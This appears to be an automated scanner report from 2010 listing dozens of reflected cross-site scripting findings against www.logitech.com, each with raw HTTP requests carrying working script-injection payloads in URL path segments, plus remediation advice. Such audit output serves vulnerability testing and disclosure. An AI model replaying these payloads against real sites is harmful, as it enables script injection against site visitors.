Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/43480972</script><script>alert(1)</script>fdf704983fa/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e846e</script><script>alert(1)</script>9bd3403eac2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/434/7288e846e</script><script>alert(1)</script>9bd3403eac2 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4e3"><script>alert(1)</script>75e334bcc3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/434/72881b4e3"><script>alert(1)</script>75e334bcc3a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ff0"><script>alert(1)</script>7ce4cc8abb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us93ff0"><script>alert(1)</script>7ce4cc8abb6/434/7454 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2423"%3b72cc3b99502 was submitted in the REST URL parameter 1. This input was echoed as d2423";72cc3b99502 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usd2423"%3b72cc3b99502/434/7454 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b86a</script><script>alert(1)</script>8eeb9ae98b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4b86a</script><script>alert(1)</script>8eeb9ae98b7/434/7454 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e89</script><script>alert(1)</script>88b82d92bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/434d2e89</script><script>alert(1)</script>88b82d92bac/7454 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5984"><script>alert(1)</script>91ed86067f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/434f5984"><script>alert(1)</script>91ed86067f9/7454 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72fc"><script>alert(1)</script>af62991ab8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/434/7454d72fc"><script>alert(1)</script>af62991ab8d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 744bf</script><script>alert(1)</script>855df44c795 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/434/7454744bf</script><script>alert(1)</script>855df44c795 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77462</script><script>alert(1)</script>5202e63abe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /77462</script><script>alert(1)</script>5202e63abe1/437/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6932a"%3bc4c06e688d0 was submitted in the REST URL parameter 1. This input was echoed as 6932a";c4c06e688d0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us6932a"%3bc4c06e688d0/437/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b70"><script>alert(1)</script>e328f9e7a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us47b70"><script>alert(1)</script>e328f9e7a0f/437/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6f"><script>alert(1)</script>a23e194a9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/437c6a6f"><script>alert(1)</script>a23e194a9bd/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47db6</script><script>alert(1)</script>c4103c39890 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/43747db6</script><script>alert(1)</script>c4103c39890/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac55e"><script>alert(1)</script>865702b8f76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usac55e"><script>alert(1)</script>865702b8f76/437/221 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4813d"%3b172b7a2f7e3 was submitted in the REST URL parameter 1. This input was echoed as 4813d";172b7a2f7e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us4813d"%3b172b7a2f7e3/437/221 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28b97</script><script>alert(1)</script>5bda9740d94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /28b97</script><script>alert(1)</script>5bda9740d94/437/221 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2832a</script><script>alert(1)</script>21736a77223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4372832a</script><script>alert(1)</script>21736a77223/221 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b02"><script>alert(1)</script>2bd86bee1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/43791b02"><script>alert(1)</script>2bd86bee1d1/221 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fedf8"><script>alert(1)</script>350ef716a7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/437/221fedf8"><script>alert(1)</script>350ef716a7f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6293e</script><script>alert(1)</script>90c69fb3532 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/437/2216293e</script><script>alert(1)</script>90c69fb3532 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ccac"%3b132199dc274 was submitted in the REST URL parameter 1. This input was echoed as 9ccac";132199dc274 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us9ccac"%3b132199dc274/439/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce7a6</script><script>alert(1)</script>1158bccdb95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ce7a6</script><script>alert(1)</script>1158bccdb95/439/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abc86"><script>alert(1)</script>795cf9f1746 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usabc86"><script>alert(1)</script>795cf9f1746/439/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b5ae</script><script>alert(1)</script>29abbd764ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4397b5ae</script><script>alert(1)</script>29abbd764ee/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36bc"><script>alert(1)</script>13b4ec3ef20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/439c36bc"><script>alert(1)</script>13b4ec3ef20/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
